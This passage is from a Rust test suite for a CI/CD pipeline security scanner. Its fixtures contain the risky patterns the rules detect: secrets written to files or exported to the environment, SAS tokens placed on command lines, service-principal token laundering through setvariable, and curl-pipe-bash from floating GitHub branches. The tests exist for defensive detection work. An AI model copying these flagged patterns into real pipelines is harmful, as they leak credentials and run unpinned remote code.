8372        "#;
8373        let g = graph_with_script_step(body, None);
8374        let findings = vm_remote_exec_via_pipeline_secret(&g);
8375        assert!(
8376            findings.is_empty(),
8377            "no SAS-mint and no secret interpolation → no finding"
8378        );
8379    }
8380
8381    #[test]
8382    fn vm_remote_exec_fires_on_az_cli_run_command() {
8383        let body = r#"
8384            az vm run-command invoke --resource-group rg --name vm `
8385                --command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
8386        "#;
8387        let g = graph_with_script_step(body, Some("DB_PASSWORD"));
8388        let findings = vm_remote_exec_via_pipeline_secret(&g);
8389        assert_eq!(findings.len(), 1);
8390        assert!(findings[0].message.contains("az vm run-command"));
8391    }
8392
8393    // ── short_lived_sas_in_command_line ─────────────────
8394
8395    #[test]
8396    fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
8397        let body = r#"
8398            $sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8399            $settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
8400        "#;
8401        let g = graph_with_script_step(body, None);
8402        let findings = short_lived_sas_in_command_line(&g);
8403        assert_eq!(findings.len(), 1);
8404        assert_eq!(
8405            findings[0].category,
8406            FindingCategory::ShortLivedSasInCommandLine
8407        );
8408        assert_eq!(findings[0].severity, Severity::Medium);
8409        assert!(findings[0].message.contains("sastokenpackages"));
8410    }
8411
8412    #[test]
8413    fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
8414        // SAS minted but never put on argv — only used to build a URL.
8415        let body = r#"
8416            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8417            $url = "https://acct.blob.core.windows.net/c/?" + $sas
8418            Invoke-WebRequest -Uri $url -OutFile foo.zip
8419        "#;
8420        let g = graph_with_script_step(body, None);
8421        let findings = short_lived_sas_in_command_line(&g);
8422        assert!(findings.is_empty(), "no command-line sink → no finding");
8423    }
8424
8425    #[test]
8426    fn sas_in_cmdline_does_not_fire_without_sas_mint() {
8427        let body = r#"
8428            $settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
8429        "#;
8430        let g = graph_with_script_step(body, None);
8431        let findings = short_lived_sas_in_command_line(&g);
8432        assert!(findings.is_empty());
8433    }
8434
8435    #[test]
8436    fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
8437        let body = r#"
8438            sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
8439            az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
8440                --settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
8441        "#;
8442        let g = graph_with_script_step(body, None);
8443        let findings = short_lived_sas_in_command_line(&g);
8444        // mint + sink in same script → fires (fallback evidence path).
8445        assert_eq!(findings.len(), 1);
8446    }
8447
8448    #[test]
8449    fn co_fire_on_solarwinds_pattern() {
8450        // Mirrors the corpus solarwinds shape: SAS minted, embedded in
8451        // CustomScriptExtension commandToExecute. Both rules must fire.
8452        let body = r#"
8453            $sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8454            Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
8455                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8456                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
8457        "#;
8458        let g = graph_with_script_step(body, None);
8459        let r6 = vm_remote_exec_via_pipeline_secret(&g);
8460        let r7 = short_lived_sas_in_command_line(&g);
8461        assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
8462        assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
8463    }
8464
8465    #[test]
8466    fn body_interpolates_var_does_not_match_prefix() {
8467        // `$sas` should not match `$sastokenpackages`.
8468        assert!(!body_interpolates_var(
8469            "Write-Host $sastokenpackages",
8470            "sas"
8471        ));
8472        assert!(body_interpolates_var(
8473            "Write-Host $sastokenpackages",
8474            "sastokenpackages"
8475        ));
8476        assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
8477    }
8478
8479    #[test]
8480    fn powershell_sas_assignments_extracts_var_names() {
8481        let body = r#"
8482            $a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
8483            $b = Get-Date
8484            $sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
8485        "#;
8486        let names = powershell_sas_assignments(body);
8487        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
8488        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
8489        assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
8490    }
8491
8492    #[test]
8493    fn bash_export_of_pipeline_secret_flagged() {
8494        let g = build_step_with_script(
8495            "TF_TOKEN",
8496            "echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
8497        );
8498        let findings = secret_to_inline_script_env_export(&g);
8499        assert_eq!(findings.len(), 1);
8500        assert_eq!(findings[0].severity, Severity::High);
8501        assert!(findings[0].message.contains("$(TF_TOKEN)"));
8502    }
8503
8504    #[test]
8505    fn powershell_assignment_of_pipeline_secret_flagged() {
8506        let g = build_step_with_script(
8507            "AppContainerDBPassword",
8508            "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
8509        );
8510        let findings = secret_to_inline_script_env_export(&g);
8511        assert_eq!(findings.len(), 1);
8512        assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
8513    }
8514
8515    #[test]
8516    fn secret_passed_as_command_argument_not_flagged() {
8517        // Secret used as a CLI argument, not assigned to a variable. This is
8518        // covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
8519        // should NOT also fire here.
8520        let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
8521        let findings = secret_to_inline_script_env_export(&g);
8522        assert!(
8523            findings.is_empty(),
8524            "command-arg use of $(SECRET) must not trip env-export rule"
8525        );
8526    }
8527
8528    #[test]
8529    fn step_without_script_body_not_flagged() {
8530        let mut g = AuthorityGraph::new(source("ado.yml"));
8531        let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
8532        let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
8533        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8534        let findings = secret_to_inline_script_env_export(&g);
8535        assert!(findings.is_empty());
8536    }
8537
8538    // ── secret_materialised_to_workspace_file ────────────────
8539
8540    #[test]
8541    fn powershell_outfile_of_secret_to_workspace_flagged() {
8542        // Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
8543        // $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
8544        let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
8545                      $TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
8546                      $TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
8547                      $TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
8548        let g = build_step_with_script("AppContainerDBPassword", script);
8549        let findings = secret_materialised_to_workspace_file(&g);
8550        assert_eq!(
8551            findings.len(),
8552            1,
8553            "Out-File of bound secret to workspace must fire"
8554        );
8555        assert_eq!(findings[0].severity, Severity::High);
8556    }
8557
8558    #[test]
8559    fn bash_redirect_of_secret_to_tfvars_flagged() {
8560        let script =
8561            "echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
8562        let g = build_step_with_script("TF_TOKEN", script);
8563        let findings = secret_materialised_to_workspace_file(&g);
8564        assert_eq!(findings.len(), 1);
8565    }
8566
8567    #[test]
8568    fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
8569        let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
8570        let findings = secret_materialised_to_workspace_file(&g);
8571        assert!(
8572            findings.is_empty(),
8573            "stdout echo (no file sink) must not trip materialisation rule"
8574        );
8575    }
8576
8577    #[test]
8578    fn write_to_unrelated_path_not_flagged() {
8579        // No workspace-path keyword, no risky extension — should not fire.
8580        let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
8581        let g = build_step_with_script("MY_SECRET", script);
8582        let findings = secret_materialised_to_workspace_file(&g);
8583        assert!(findings.is_empty());
8584    }
8585
8586    // ── keyvault_secret_to_plaintext ─────────────────────────
8587
8588    #[test]
8589    fn keyvault_asplaintext_flagged() {
8590        let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
8591                      Write-Host done";
8592        let g = build_step_with_script("UNUSED", script);
8593        let findings = keyvault_secret_to_plaintext(&g);
8594        assert_eq!(findings.len(), 1);
8595        assert_eq!(findings[0].severity, Severity::Medium);
8596    }
8597
8598    #[test]
8599    fn keyvault_secretvaluetext_legacy_pattern_flagged() {
8600        let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
8601        let g = build_step_with_script("UNUSED", script);
8602        let findings = keyvault_secret_to_plaintext(&g);
8603        assert_eq!(findings.len(), 1);
8604    }
8605
8606    #[test]
8607    fn convertfrom_securestring_asplaintext_flagged() {
8608        let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
8609        let g = build_step_with_script("UNUSED", script);
8610        let findings = keyvault_secret_to_plaintext(&g);
8611        assert_eq!(findings.len(), 1);
8612    }
8613
8614    #[test]
8615    fn keyvault_securestring_handling_not_flagged() {
8616        // Using the secret as SecureString (no -AsPlainText) is the safe pattern.
8617        let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
8618                      $cred = New-Object PSCredential 'svc', $sec.SecretValue";
8619        let g = build_step_with_script("UNUSED", script);
8620        let findings = keyvault_secret_to_plaintext(&g);
8621        assert!(
8622            findings.is_empty(),
8623            "SecureString-only handling is the recommended pattern and must not fire"
8624        );
8625    }
8626
8627    // ── terraform_auto_approve_in_prod ──────────────────────
8628
8629    fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
8630        let mut m = std::collections::HashMap::new();
8631        for (k, v) in meta {
8632            m.insert((*k).to_string(), (*v).to_string());
8633        }
8634        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, m)
8635    }
8636
8637    #[test]
8638    fn terraform_auto_approve_against_prod_connection_fires() {
8639        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8640        step_with_meta(
8641            &mut g,
8642            "Terraform : Apply",
8643            &[
8644                (META_TERRAFORM_AUTO_APPROVE, "true"),
8645                (META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
8646            ],
8647        );
8648
8649        let findings = terraform_auto_approve_in_prod(&g);
8650        assert_eq!(findings.len(), 1);
8651        assert_eq!(findings[0].severity, Severity::Critical);
8652        assert_eq!(
8653            findings[0].category,
8654            FindingCategory::TerraformAutoApproveInProd
8655        );
8656        assert!(
8657            findings[0].message.contains("sharedservice-w365-prod-sc"),
8658            "message should name the connection, got: {}",
8659            findings[0].message
8660        );
8661    }
8662
8663    #[test]
8664    fn terraform_auto_approve_via_edge_to_service_connection_identity() {
8665        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8666        let step = step_with_meta(
8667            &mut g,
8668            "Terraform : Apply",
8669            &[(META_TERRAFORM_AUTO_APPROVE, "true")],
8670        );
8671        let mut id_meta = std::collections::HashMap::new();
8672        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
8673        let conn = g.add_node_with_metadata(
8674            NodeKind::Identity,
8675            "alz-infra-sc-prd-uks",
8676            TrustZone::FirstParty,
8677            id_meta,
8678        );
8679        g.add_edge(step, conn, EdgeKind::HasAccessTo);
8680
8681        let findings = terraform_auto_approve_in_prod(&g);
8682        assert_eq!(findings.len(), 1);
8683        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
8684    }
8685
8686    #[test]
8687    fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
8688        // Per blue-team CC-4: env gate is a partial control (the gate's
8689        // approver list is invisible from YAML), so the finding stays
8690        // visible at Medium rather than disappearing entirely.
8691        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8692        step_with_meta(
8693            &mut g,
8694            "Terraform : Apply",
8695            &[
8696                (META_TERRAFORM_AUTO_APPROVE, "true"),
8697                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
8698                (META_ENV_APPROVAL, "true"),
8699            ],
8700        );
8701
8702        let findings = terraform_auto_approve_in_prod(&g);
8703        assert_eq!(
8704            findings.len(),
8705            1,
8706            "env-gated apply must still emit a finding"
8707        );
8708        assert_eq!(
8709            findings[0].severity,
8710            Severity::Medium,
8711            "env-gated apply downgrades Critical → Medium (compensating control credit)"
8712        );
8713        assert!(findings[0]
8714            .message
8715            .contains("`environment:` binding present"));
8716    }
8717
8718    #[test]
8719    fn terraform_auto_approve_against_non_prod_does_not_fire() {
8720        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8721        step_with_meta(
8722            &mut g,
8723            "Terraform : Apply",
8724            &[
8725                (META_TERRAFORM_AUTO_APPROVE, "true"),
8726                (META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
8727            ],
8728        );
8729
8730        let findings = terraform_auto_approve_in_prod(&g);
8731        assert!(findings.is_empty(), "dev connection must not match prod");
8732    }
8733
8734    #[test]
8735    fn terraform_apply_without_auto_approve_does_not_fire() {
8736        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8737        step_with_meta(
8738            &mut g,
8739            "Terraform : Apply",
8740            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
8741        );
8742
8743        let findings = terraform_auto_approve_in_prod(&g);
8744        assert!(findings.is_empty());
8745    }
8746
8747    #[test]
8748    fn looks_like_prod_connection_matches_real_world_names() {
8749        assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
8750        assert!(looks_like_prod_connection("alz-infra-sc-prd"));
8751        assert!(looks_like_prod_connection("prod-tenant-arm"));
8752        assert!(looks_like_prod_connection("PROD"));
8753        assert!(looks_like_prod_connection("my_prod_arm"));
8754        // Negatives — substrings inside other words must not match
8755        assert!(!looks_like_prod_connection("approver-sc"));
8756        assert!(!looks_like_prod_connection("reproducer-sc"));
8757        assert!(!looks_like_prod_connection("dev-sc"));
8758        assert!(!looks_like_prod_connection("staging"));
8759    }
8760
8761    // ── addspn_with_inline_script ───────────────────────────
8762
8763    #[test]
8764    fn addspn_with_inline_script_fires_with_basic_body() {
8765        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8766        step_with_meta(
8767            &mut g,
8768            "ado : azure : login (federated)",
8769            &[
8770                (META_ADD_SPN_TO_ENV, "true"),
8771                (META_SCRIPT_BODY, "az account show --query id -o tsv"),
8772            ],
8773        );
8774
8775        let findings = addspn_with_inline_script(&g);
8776        assert_eq!(findings.len(), 1);
8777        assert_eq!(findings[0].severity, Severity::High);
8778        assert!(!findings[0]
8779            .message
8780            .contains("explicit token laundering detected"));
8781    }
8782
8783    #[test]
8784    fn addspn_with_inline_script_escalates_message_on_token_laundering() {
8785        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8786        step_with_meta(
8787            &mut g,
8788            "ado : azure : login (federated)",
8789            &[
8790                (META_ADD_SPN_TO_ENV, "true"),
8791                (
8792                    META_SCRIPT_BODY,
8793                    "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
8794                ),
8795            ],
8796        );
8797
8798        let findings = addspn_with_inline_script(&g);
8799        assert_eq!(findings.len(), 1);
8800        assert!(
8801            findings[0]
8802                .message
8803                .contains("explicit token laundering detected"),
8804            "message should escalate, got: {}",
8805            findings[0].message
8806        );
8807    }
8808
8809    #[test]
8810    fn addspn_without_inline_script_does_not_fire() {
8811        // No META_SCRIPT_BODY → scriptPath form, not inline
8812        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8813        step_with_meta(
8814            &mut g,
8815            "AzureCLI scriptPath",
8816            &[(META_ADD_SPN_TO_ENV, "true")],
8817        );
8818
8819        let findings = addspn_with_inline_script(&g);
8820        assert!(findings.is_empty());
8821    }
8822
8823    #[test]
8824    fn inline_script_without_addspn_does_not_fire() {
8825        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8826        step_with_meta(
8827            &mut g,
8828            "az account show",
8829            &[(META_SCRIPT_BODY, "az account show")],
8830        );
8831
8832        let findings = addspn_with_inline_script(&g);
8833        assert!(findings.is_empty());
8834    }
8835
8836    #[test]
8837    fn script_launders_spn_token_recognises_known_markers() {
8838        assert!(script_launders_spn_token(
8839            "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
8840        ));
8841        assert!(script_launders_spn_token(
8842            "echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
8843        ));
8844        // setvariable without token material → not laundering, just env mutation
8845        assert!(!script_launders_spn_token(
8846            "echo \"##vso[task.setvariable variable=X]hello\""
8847        ));
8848        // No setvariable at all
8849        assert!(!script_launders_spn_token("$env:idToken"));
8850    }
8851
8852    // ── parameter_interpolation_into_shell ──────────────────
8853
8854    fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
8855        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8856        g.parameters.insert(name.to_string(), spec);
8857        g
8858    }
8859
8860    #[test]
8861    fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
8862        let mut g = graph_with_param(
8863            ParamSpec {
8864                param_type: "string".into(),
8865                has_values_allowlist: false,
8866            },
8867            "appName",
8868        );
8869        step_with_meta(
8870            &mut g,
8871            "terraform workspace",
8872            &[(
8873                META_SCRIPT_BODY,
8874                "terraform workspace select -or-create ${{ parameters.appName }}",
8875            )],
8876        );
8877
8878        let findings = parameter_interpolation_into_shell(&g);
8879        assert_eq!(findings.len(), 1);
8880        assert_eq!(findings[0].severity, Severity::Medium);
8881        assert!(findings[0].message.contains("appName"));
8882    }
8883
8884    #[test]
8885    fn parameter_interpolation_with_values_allowlist_does_not_fire() {
8886        let mut g = graph_with_param(
8887            ParamSpec {
8888                param_type: "string".into(),
8889                has_values_allowlist: true,
8890            },
8891            "location",
8892        );
8893        step_with_meta(
8894            &mut g,
8895            "Terraform Plan",
8896            &[(
8897                META_SCRIPT_BODY,
8898                "terraform plan -var=\"location=${{ parameters.location }}\"",
8899            )],
8900        );
8901
8902        let findings = parameter_interpolation_into_shell(&g);
8903        assert!(
8904            findings.is_empty(),
8905            "values: allowlist must suppress the finding"
8906        );
8907    }
8908
8909    #[test]
8910    fn parameter_interpolation_default_type_is_treated_as_string() {
8911        let mut g = graph_with_param(
8912            ParamSpec {
8913                // ADO defaults missing `type:` to string — same risk
8914                param_type: "".into(),
8915                has_values_allowlist: false,
8916            },
8917            "appName",
8918        );
8919        step_with_meta(
8920            &mut g,
8921            "Terraform : Plan",
8922            &[(
8923                META_SCRIPT_BODY,
8924                "terraform plan -var \"appName=${{ parameters.appName }}\"",
8925            )],
8926        );
8927
8928        let findings = parameter_interpolation_into_shell(&g);
8929        assert_eq!(findings.len(), 1, "missing type: must default to string");
8930    }
8931
8932    #[test]
8933    fn parameter_interpolation_skips_non_string_params() {
8934        let mut g = graph_with_param(
8935            ParamSpec {
8936                param_type: "boolean".into(),
8937                has_values_allowlist: false,
8938            },
8939            "enabled",
8940        );
8941        step_with_meta(
8942            &mut g,
8943            "step",
8944            &[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
8945        );
8946
8947        let findings = parameter_interpolation_into_shell(&g);
8948        assert!(findings.is_empty(), "boolean params can't carry shell");
8949    }
8950
8951    #[test]
8952    fn parameter_interpolation_no_spaces_form_also_matches() {
8953        let mut g = graph_with_param(
8954            ParamSpec {
8955                param_type: "string".into(),
8956                has_values_allowlist: false,
8957            },
8958            "x",
8959        );
8960        step_with_meta(
8961            &mut g,
8962            "step",
8963            &[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
8964        );
8965
8966        let findings = parameter_interpolation_into_shell(&g);
8967        assert_eq!(findings.len(), 1);
8968    }
8969
8970    #[test]
8971    fn parameter_interpolation_skips_step_without_script_body() {
8972        let mut g = graph_with_param(
8973            ParamSpec {
8974                param_type: "string".into(),
8975                has_values_allowlist: false,
8976            },
8977            "appName",
8978        );
8979        // Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
8980        g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
8981
8982        let findings = parameter_interpolation_into_shell(&g);
8983        assert!(findings.is_empty());
8984    }
8985
8986    // ── runtime_script_fetched_from_floating_url ───────────────
8987
8988    fn step_with_body(body: &str) -> AuthorityGraph {
8989        let mut g = AuthorityGraph::new(source("ci.yml"));
8990        let id = g.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
8991        if let Some(node) = g.nodes.get_mut(id) {
8992            node.metadata
8993                .insert(META_SCRIPT_BODY.into(), body.to_string());
8994        }
8995        g
8996    }
8997
8998    #[test]
8999    fn floating_curl_pipe_bash_master_is_flagged() {
9000        let g = step_with_body(
9001            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
9002        );
9003        let findings = runtime_script_fetched_from_floating_url(&g);
9004        assert_eq!(findings.len(), 1);
9005        assert_eq!(findings[0].severity, Severity::High);
9006        assert_eq!(
9007            findings[0].category,
9008            FindingCategory::RuntimeScriptFetchedFromFloatingUrl
9009        );
9010    }
9011
9012    #[test]
9013    fn floating_deno_run_main_is_flagged() {
9014        let g = step_with_body(
9015            "deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
9016        );
9017        let findings = runtime_script_fetched_from_floating_url(&g);
9018        assert_eq!(findings.len(), 1);
9019    }
9020
9021    #[test]
9022    fn pinned_curl_url_with_tag_not_flagged() {
9023        let g = step_with_body(
9024            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
9025        );
9026        let findings = runtime_script_fetched_from_floating_url(&g);
9027        assert!(findings.is_empty(), "tag-pinned URL must not fire");
9028    }
9029
9030    #[test]
9031    fn curl_without_pipe_to_shell_not_flagged() {
9032        // `curl -O` writes to disk; the script isn't executed inline.
9033        let g = step_with_body(
9034            "curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
9035        );
9036        let findings = runtime_script_fetched_from_floating_url(&g);
9037        assert!(findings.is_empty(), "download-only must not fire");
9038    }
9039
9040    #[test]
9041    fn bash_process_substitution_curl_main_is_flagged() {
9042        let g = step_with_body(
9043            "bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
9044        );
9045        let findings = runtime_script_fetched_from_floating_url(&g);
9046        assert_eq!(findings.len(), 1);
9047    }
9048
9049    // ── pr_trigger_with_floating_action_ref ────────────────────
9050
9051    fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
9052        let mut g = AuthorityGraph::new(source("pr.yml"));
9053        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9054        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9055        g
9056    }
9057
9058    #[test]
9059    fn pull_request_target_with_floating_main_action_flagged_critical() {
9060        let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
9061        let findings = pr_trigger_with_floating_action_ref(&g);
9062        assert_eq!(findings.len(), 1);
9063        assert_eq!(findings[0].severity, Severity::Critical);
9064        assert_eq!(
9065            findings[0].category,
9066            FindingCategory::PrTriggerWithFloatingActionRef
9067        );
9068    }
9069
9070    #[test]
9071    fn pull_request_target_with_sha_pinned_action_not_flagged() {
9072        let g = graph_with_trigger_and_action(
9073            "pull_request_target",
9074            "denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
9075        );
9076        let findings = pr_trigger_with_floating_action_ref(&g);
9077        assert!(findings.is_empty());
9078    }
9079
9080    #[test]
9081    fn issue_comment_with_floating_action_flagged() {
9082        let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
9083        let findings = pr_trigger_with_floating_action_ref(&g);
9084        assert_eq!(findings.len(), 1);
9085    }
9086
9087    #[test]
9088    fn pull_request_only_does_not_trigger_critical_compound_rule() {
9089        // `pull_request` (without `_target`) is the safe trigger — no base
9090        // repo write. Rule 4 must not fire on it.
9091        let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
9092        let findings = pr_trigger_with_floating_action_ref(&g);
9093        assert!(
9094            findings.is_empty(),
9095            "pull_request alone must not produce a critical compound finding"
9096        );
9097    }
9098
9099    #[test]
9100    fn comma_separated_trigger_with_pull_request_target_flagged() {
9101        let g = graph_with_trigger_and_action(
9102            "pull_request_target,push,workflow_dispatch",
9103            "foo/bar@main",
9104        );
9105        let findings = pr_trigger_with_floating_action_ref(&g);
9106        assert_eq!(findings.len(), 1);
9107    }
9108
9109    // ── untrusted_api_response_to_env_sink ─────────────────────
9110
9111    fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
9112        let mut g = AuthorityGraph::new(source("consumer.yml"));
9113        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9114        let id = g.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
9115        if let Some(node) = g.nodes.get_mut(id) {
9116            node.metadata
9117                .insert(META_SCRIPT_BODY.into(), body.to_string());
9118        }
9119        g
9120    }
9121
9122    #[test]
9123    fn workflow_run_gh_pr_view_to_github_env_flagged() {
9124        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
9125        let g = graph_with_trigger_and_step_body("workflow_run", body);
9126        let findings = untrusted_api_response_to_env_sink(&g);
9127        assert_eq!(findings.len(), 1);
9128        assert_eq!(findings[0].severity, Severity::High);
9129    }
9130
9131    #[test]
9132    fn workflow_run_without_env_sink_not_flagged() {
9133        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
9134        let g = graph_with_trigger_and_step_body("workflow_run", body);
9135        let findings = untrusted_api_response_to_env_sink(&g);
9136        assert!(findings.is_empty());
9137    }
9138
9139    #[test]
9140    fn push_trigger_writing_to_env_not_flagged() {
9141        // Trigger is not in scope (push isn't a cross-workflow trust boundary)
9142        let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
9143        let g = graph_with_trigger_and_step_body("push", body);
9144        let findings = untrusted_api_response_to_env_sink(&g);
9145        assert!(findings.is_empty());
9146    }
9147
9148    #[test]
9149    fn workflow_run_multiline_capture_then_write_flagged() {
9150        let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
9151        let g = graph_with_trigger_and_step_body("workflow_run", body);
9152        let findings = untrusted_api_response_to_env_sink(&g);
9153        assert_eq!(findings.len(), 1);
9154    }
9155
9156    // ── pr_build_pushes_image_with_floating_credentials ────────
9157
9158    fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
9159        let mut g = AuthorityGraph::new(source("pr-build.yml"));
9160        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9161        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9162        g
9163    }
9164
9165    #[test]
9166    fn pr_with_floating_login_to_gar_flagged() {
9167        let g = graph_pr_with_login_action(
9168            "pull_request",
9169            "grafana/shared-workflows/actions/login-to-gar@main",
9170        );
9171        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9172        assert_eq!(findings.len(), 1);
9173        assert_eq!(findings[0].severity, Severity::High);
9174        assert_eq!(
9175            findings[0].category,
9176            FindingCategory::PrBuildPushesImageWithFloatingCredentials
9177        );
9178    }
9179
9180    #[test]
9181    fn pr_with_floating_docker_login_action_flagged() {
9182        let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
9183        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9184        assert_eq!(findings.len(), 1);
9185    }
9186
9187    #[test]
9188    fn pr_with_sha_pinned_docker_login_not_flagged() {
9189        let g = graph_pr_with_login_action(
9190            "pull_request",
9191            "docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
9192        );
9193        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9194        assert!(findings.is_empty());
9195    }
9196
9197    #[test]
9198    fn push_trigger_with_floating_login_action_not_flagged() {
9199        // Outside PR context — different rule (unpinned_action) covers it.
9200        let g = graph_pr_with_login_action("push", "docker/login-action@v3");
9201        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9202        assert!(findings.is_empty());
9203    }
9204
9205    #[test]
9206    fn pr_with_unrelated_unpinned_action_not_flagged() {
9207        // Rule scopes itself to registry-login actions only; generic actions
9208        // are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
9209        let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
9210        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9211        assert!(findings.is_empty());
9212    }
9213
9214    // ── unpinned_action severity tiering ─────────────────────────
9215
9216    #[test]
9217    fn unpinned_action_well_known_first_party_is_medium() {
9218        // `actions/checkout@v4` — owner is the GitHub-maintained `actions`
9219        // org. The supply-chain surface is real but operationally narrow,
9220        // so the rule emits Medium rather than the default High.
9221        let mut g = AuthorityGraph::new(source("ci.yml"));
9222        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
9223
